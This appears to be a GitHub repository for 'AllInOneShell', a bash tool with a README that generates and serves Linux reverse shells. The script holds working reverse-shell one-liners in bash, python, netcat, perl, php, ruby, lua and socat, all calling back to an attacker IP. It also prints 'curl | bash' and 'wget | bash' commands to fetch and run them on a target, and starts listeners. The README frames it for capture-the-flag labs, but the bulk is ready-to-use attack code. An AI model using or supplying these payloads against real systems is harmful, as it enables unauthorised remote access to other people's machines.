├── images ├── demo.png └── config.png ├── README.md └── aios.sh /images/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Fr3dd1e/AllInOneShell/HEAD/images/demo.png -------------------------------------------------------------------------------- /images/config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Fr3dd1e/AllInOneShell/HEAD/images/config.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AllInOneShell 2 | by Freddie 3 | 4 | ![demo image](images/demo.png) 5 | 6 | ### Creation 7 | 8 | I was faced with a couple of problems that made me decide to make this tool: 9 | * Copying and pasting reverse shells directly into URLs, would often break, so I would inevitably have to transfer a reverse shell from my machine remotely, then execute it with bash. 10 | * Often, machines will not have useful programs such as `python`, which means the reverse shell will be useless. 11 | * Running sudo for ports under 1000 gets *real* annoying. 12 | 13 | ### Features 14 | 15 | AllInOneShell essentially tries to fix the above problems. 16 | What it does: 17 | - Adds network admin capabilities to python3/netcat, so no sudo is needed. 18 | - Creates a bash script that systematically tries multiple programs to see if installed, and if so, connects back with a reverse shell. 19 | - Writes the bash script to a unique temporary directory, and starts a backgrounded HTTP server there. 20 | - Prints how to call the bash script from your local machine using `curl` or `wget` 21 | - Starts a netcat listener to catch any reverse shells. 22 | - The HTTP server will timeout after 5 minutes, as the process is detached. 23 | - Added potential for command line parameters, so can be run in batch mode if needed: 24 | `aios [IP] [PORT] [MODE]` 25 | 26 | UPDATE: 27 | - I've now incorporated a quick script I was using for generating a socat encrypted reverse shell into AIOS. 28 | - You are now presented with the option for either the more reliable (multiple programs checked) netcat listener/file, or the encrypted socat listener/file. 29 | - Unfortunately I couldn't include the socat reverse shell into the general bash revshell file, as it uses a different type of listener. 30 | 31 | ### Config 32 | 33 | The default port for the HTTP server is `80` (to try and bypass some basic firewall restrictions), but this can be changed easily at the top of the script in "# Config Items". 34 | Be aware, the HTTP process detaches and once the reverse shell comes through, it can be a pain to kill. There is a timeout for 5 minutes on the process, but that can be extended in the config again. 35 | 36 | ![config image](images/config.png) 37 | 38 | 39 | ### Notes 40 | 41 | > The `nc.traditional` binary struggles to keep TCP sockets open, so I've built in a quick function to detect if it is being used by `nc`, and if so upgrades it to `ncat`, which is generally better (also supports IPv6), and more secure (isn't compiled using the GAPING_SECURITY_FLAW flag). 42 | 43 | > Additionally, the reverse shells are currently only for Linux, but I'm definitely working on expanding this to work for Windows/Powershell. 44 | 45 | > This program is made specifically for HTB/THM, and should definitely not be used for anything other than boot2root machines. It is quite clunky, but it gives the advantage of convenience, as it tries to incorporate everything you need in a bash script. 46 | Additionally, the tmp directories are not deleted, but will be on machine restart. 47 | `rm -r /tmp/tmp-*`, to do this manually. 48 | 49 | > ```sh 50 | ln -sf [path to aios.sh] /usr/bin/aios 51 | ``` 52 | 53 | > Then to call the reverse shell tool, simply run `aios`. 54 | 55 | > This tool only covers a few of the programs that can be used for reverse shells. 56 | To see more, visit https://www.revshells.com/, by the notorious 0day. 57 | -------------------------------------------------------------------------------- /aios.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Reverse Shell Generator by Freddie 3 | 4 | # Colours: 5 | C=$(printf '\033') 6 | RED="${C}[1;31m" 7 | GREEN="${C}[1;32m" 8 | BLUE="${C}[1;34m" 9 | YELLOW="${C}[1;33m" 10 | LIGHT_GREY="${C}[1;37m" 11 | NC="${C}[0m" 12 | UNDERLINED="${C}[4m" 13 | 14 | # Config Items 15 | http_port=80 16 | http_timeout=180 17 | 18 | 19 | # Banner: 20 | function print_banner(){ 21 | banner=' __ __ __ __ 22 | / /\ /\ \ /\ \ / /\ 23 | / / \ \ \ \ / \ \ / / \ 24 | / / /\ \ /\ \_\ / /\ \ \ / / /\ \__ 25 | / / /\ \ \ / /\/_/ / / /\ \ \ / / /\ \___\ 26 | / / / \ \ \ / / / / / / \ \_\ \ \ \ \/___/ 27 | / / /___/ /\ \ / / / / / / / / / \ \ \ 28 | / / /_____/ /\ \ / / / / / / / / / _ \ \ \ 29 | / /_________/\ \ \ ___/ / /__ / / /___/ / / /_/\__/ / / 30 | / / /_ __\ \_\/\__\/_/___\ / / /____\/ / \ \/___/ / 31 | \_\___\ /____/_/\/_________/ \/_________/ \_____\/ 32 | ' 33 | echo "$LIGHT_GREY$banner$NC" 34 | printf $RED" AllInOneShell"$NC$YELLOW" - by Freddie \n"$NC 35 | printf "\n" 36 | } 37 | 38 | # Initalise Local IP/Port 39 | export IP=$1 40 | export PORT=$2 41 | export MODE=$3 42 | 43 | # Get ip/port from input: 44 | get_ip(){ 45 | echo -n "Enter IP: " 46 | read IP 47 | } 48 | 49 | get_port(){ 50 | echo -n "Enter Port: " 51 | read PORT 52 | } 53 | 54 | function get_port_ip(){ 55 | # Get ip/port from args: 56 | if [ "$IP" ]; then 57 | echo -n "" 58 | else 59 | if [[ $(ifconfig tun0 2>/dev/null | grep 'inet ' | awk '{print $2}' | wc -c) -eq 0 ]]; then 60 | get_ip; 61 | else 62 | echo $BLUE"[*]"$NC" VPN connection found: using tun0 as address" 63 | export IP=$(ifconfig tun0 2>/dev/null | grep 'inet ' | awk '{print $2}') 64 | fi 65 | fi 66 | 67 | if [ "$PORT" ]; then 68 | echo -n "" 69 | else 70 | get_port; 71 | fi 72 | 73 | # Enable sudo if port is <1000 74 | if [ $PORT -lt 1000 ]; then 75 | sudo="sudo"; 76 | if [[ -v $(getcap $(readlink -f /usr/bin/nc) >/dev/null) ]]; then 77 | echo $BLUE"[*] "$NC"Port under 1000 has been chosen, sudo is required" 78 | else 79 | echo $BLUE"[*] "$NC"Capabilities found - no need for sudo." 80 | echo 81 | fi 82 | else 83 | echo -n ""; 84 | fi 85 | } 86 | 87 | # Because this exports, basically the variable needs to be exported before functions are called. 88 | # I could rearrange the order, and pass in the IP/PORT as an arg, but realistically, I don't have the time right now. 89 | print_banner 90 | get_port_ip 91 | 92 | # Shell commands: 93 | 94 | cmd=' 95 | if command -v bash >/dev/null 2>&1; then 96 | echo "Command that worked: bash" > /dev/tcp/IP_REPLACE/PORT_REPLACE 97 | /bin/bash -i >& /dev/tcp/IP_REPLACE/PORT_REPLACE 0>&1 98 | exit; 99 | elif command -v python >/dev/null 2>&1; then 100 | echo "Command that worked: python" > /dev/tcp/IP_REPLACE/PORT_REPLACE 101 | python -c '\''import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("IP_REPLACE",PORT_REPLACE)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'\'' 102 | exit; 103 | elif command -v python3 >/dev/null 2>&1; then 104 | echo "Command that worked: python3" > /dev/tcp/IP_REPLACE/PORT_REPLACE 105 | python3 -c '\''import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("IP_REPLACE",PORT_REPLACE)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'\'' 106 | exit; 107 | elif command -v nc >/dev/null 2>&1; then 108 | echo "Command that worked: nc" > /dev/tcp/IP_REPLACE/PORT_REPLACE 109 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_REPLACE PORT_REPLACE >/tmp/f 110 | exit; 111 | elif command -v perl >/dev/null 2>&1; then 112 | echo "Command that worked: perl" > /dev/tcp/IP_REPLACE/PORT_REPLACE 113 | perl -e '\''use Socket;$i="IP_REPLACE";$p=PORT_REPLACE;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\'' 114 | exit; 115 | elif command -v sh >/dev/null 2>&1; then 116 | echo "Command that worked: sh" > /dev/tcp/IP_REPLACE/PORT_REPLACE 117 | /bin/sh -i >& /dev/tcp/IP_REPLACE/PORT_REPLACE 0>&1 118 | exit; 119 | elif command -v php >/dev/null 2>&1; then 120 | echo "Command that worked: php" > /dev/tcp/IP_REPLACE/PORT_REPLACE 121 | php -r '\''$sock=fsockopen("IP_REPLACE",PORT_REPLACE);exec("/bin/sh -i <&3 >&3 2>&3");'\'' 122 | exit; 123 | elif command -v ruby >/dev/null 2>&1; then 124 | echo "Command that worked: ruby" > /dev/tcp/IP_REPLACE/PORT_REPLACE 125 | ruby -rsocket -e '\''f=TCPSocket.open("IP_REPLACE",PORT_REPLACE).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'\'' 126 | exit; 127 | elif command -v lua >/dev/null 2>&1; then 128 | echo "Command that worked: lua" > /dev/tcp/IP_REPLACE/PORT_REPLACE 129 | lua -e '\''require("socket");require("os");t=socket.tcp();t:connect("IP_REPLACE","PORT_REPLACE");os.execute("/bin/sh -i <&3 >&3 2>&3");'\'' 130 | exit; 131 | 132 | # Add your own reverse shells: 133 | #elif command -v [command] >/dev/null 2>&1; then 134 | # [command rev shell] 135 | # exit; 136 | 137 | else 138 | echo "No programs installed!" > /dev/tcp/IP_REPLACE/PORT_REPLACE 139 | fi 140 | ' 141 | 142 | check_netcat(){ 143 | binary=$(readlink -f $(which nc)) 144 | if [[ $binary == "/usr/bin/ncat" ]]; then 145 | echo -n "" 146 | else 147 | echo -n $BLUE"[*]"$NC" Wrong netcat binary found, would you like to install ncat (Y/n): " 148 | read CHOICE 149 | if [[ ${CHOICE@U} == "N" ]]; then 150 | echo -n "" 151 | else 152 | sudo apt install ncat 153 | fi 154 | fi 155 | } 156 | 157 | 158 | # Install socat, if necessary 159 | if [[ $(which socat) == "" ]]; then 160 | echo "${BLUE}[*]${NC} Socat is not installed!" 161 | sudo apt install socat -y 162 | fi 163 | 164 | # Add capabilities to netcat, socat and python, if not found. 165 | if [[ -v $(getcap $(readlink -f /usr/bin/nc) | grep -i "bind" >/dev/null 2>&1) ]]; then 166 | sudo setcap 'CAP_NET_BIND_SERVICE+ep' $(readlink -f /usr/bin/nc) 167 | echo $BLUE"[*] "$NC"Added network capabilities to netcat" 168 | fi 169 | 170 | if [[ -v $(getcap $(readlink -f /usr/bin/python3) | grep -i "bind" >/dev/null 2>&1) ]]; then 171 | sudo setcap 'CAP_NET_BIND_SERVICE+ep' $(readlink -f /usr/bin/python3) 172 | echo $BLUE"[*] "$NC"Added network capabilities to python3" 173 | fi 174 | 175 | if [[ -v $(getcap $(readlink -f $(which socat)) | grep -i "bind" >/dev/null 2>&1) ]]; then 176 | sudo setcap 'CAP_NET_BIND_SERVICE+ep' $(readlink -f $(which socat)) 177 | echo $BLUE"[*] "$NC"Added network capabilities to socat" 178 | fi 179 | 180 | 181 | function socat_listen(){ 182 | if [ $(which nc) ]; then 183 | echo $LIGHT_GREY"[*] "$NC"Socat listener started on port $PORT" 184 | exec socat -d -d OPENSSL-LISTEN:${PORT},cert=$tmp_dir/shell_public.pem,verify=0 - 185 | else 186 | printf $LIGHT_GREY"[=]"$NC" Socat is not installed on the system!\n" 187 | fi 188 | } 189 | 190 | 191 | socat_file() { 192 | 193 | if [[ $(echo -n $IP) == "" ]]; then 194 | echo "${YELLOW}[-]${NC} IP not found - exiting." 195 | exit 196 | fi 197 | 198 | echo "${RED}[*]${NC} Creating socat file: $tmp_dir/shell.sh" 199 | echo "" 200 | echo "socat OPENSSL:${IP}:${PORT},verify=0 EXEC:/bin/bash,pty,stderr,sigint,setsid,sane" > $tmp_dir/shell.sh 201 | } 202 | 203 | gen_keys() { 204 | echo $RED"[*] "$NC"Writing certificate/key to temp directory: ${BLUE}${tmp_dir}${NC}" 205 | openssl req -newkey rsa:2048 -nodes -keyout ${tmp_dir}/private_shell.key -x509 -days 365 -out ${tmp_dir}/shell_cert.crt -batch >/dev/null 2>&1 206 | cat ${tmp_dir}/private_shell.key ${tmp_dir}/shell_cert.crt > ${tmp_dir}/shell_public.pem 207 | echo 208 | } 209 | 210 | 211 | function use_netcat(){ 212 | if [ $(which nc) ]; then 213 | echo $LIGHT_GREY"[*] "$NC"Netcat listener started on port $PORT" 214 | exec nc -klvnp $PORT 215 | else 216 | printf $LIGHT_GREY"[=]"$NC" Netcat is not installed on the system!\n" 217 | fi 218 | } 219 | echo $IP 220 | echo $PORT 221 | cmd=$(echo "$cmd" | sed -e "s/IP_REPLACE/$IP/g" | sed -e "s/PORT_REPLACE/$PORT/g") 222 | 223 | function rev_file(){ 224 | echo "$cmd" > "$tmp_dir/shell.sh" 225 | echo $BLUE"[*] "$NC"Generated revshell file: ${BLUE}${tmp_dir}/shell.sh${NC}" 226 | echo 227 | 228 | } 229 | 230 | function http_server(){ 231 | # Uses wget's option to write to stdout, so nothing is stored in memory ;\) 232 | curl_cmd=$(echo "curl -s http://$IP:$http_port/shell.sh | bash" | sed -e "s/:80\//\//g") 233 | wget_cmd=$(echo "wget -O - http://$IP:$http_port/shell.sh | bash" | sed -e "s/:80\//\//g") 234 | echo $RED"[*] "$NC"Execute reverse shell:" 235 | echo "$curl_cmd" 236 | echo "$wget_cmd" 237 | echo 238 | echo $LIGHT_GREY"[*] "$NC"HTTP Server started in background" 239 | timeout -k 9 $http_timeout python3 -m http.server $http_port --directory $tmp_dir & 240 | sleep $http_timeout && rm -r ${tmp_dir} & 241 | sleep 1.5 242 | echo 243 | } 244 | 245 | function kill_servers(){ 246 | other_servers=$(ps faux | grep "python3 -m http.server $http_port" | grep -v "grep ") 247 | pid=$(echo "$other_servers" | awk '{print $2}') 248 | if [[ $(echo -n "$other_servers" | wc -c) -gt 0 ]]; then 249 | echo $RED"[*] "$NC"Killed HTTP server running on the same port" 250 | kill -9 ${pid} 251 | fi 252 | echo 253 | } 254 | 255 | 256 | function choose_mode(){ 257 | echo "1) Netcat multi-shell" 258 | echo "2) Socat encrypted shell" 259 | echo -n "[1|2]: " 260 | read MODE 261 | } 262 | 263 | function run_netcat(){ 264 | check_netcat 265 | rev_file 266 | http_server 267 | use_netcat 268 | } 269 | 270 | function run_socat(){ 271 | socat_file 272 | gen_keys 273 | http_server 274 | socat_listen 275 | } 276 | 277 | 278 | # Create temporary directory to operate from 279 | export tmp_dir=$(mktemp -d) 280 | 281 | 282 | if [[ "$MODE" != "" ]]; then 283 | echo -n "" 284 | else 285 | choose_mode 286 | fi 287 | 288 | # Print options 289 | printf $LIGHT_GREY"[*]"$NC" IP: $IP\n" 290 | printf $LIGHT_GREY"[*]"$NC" PORT: $PORT\n" 291 | 292 | 293 | 294 | case $MODE in 295 | 1) echo $LIGHT_GREY"[*]"$NC" MODE: Netcat"; 296 | echo "" 297 | kill_servers 298 | run_netcat 299 | ;; 300 | 2) echo $LIGHT_GREY"[*]"$NC" MODE: Socat"; 301 | echo "" 302 | kill_servers 303 | run_socat 304 | ;; 305 | esac 306 | 307 | rm -rf ${tmp_dir} 308 | 309 | # Who knew you could write a bash script over one line long huh? 310 | # Unfortunately both the reverse shell and the listener have to be using the --ssl flag in ncat for it to work. So it's not currently implemented. 311 | --------------------------------------------------------------------------------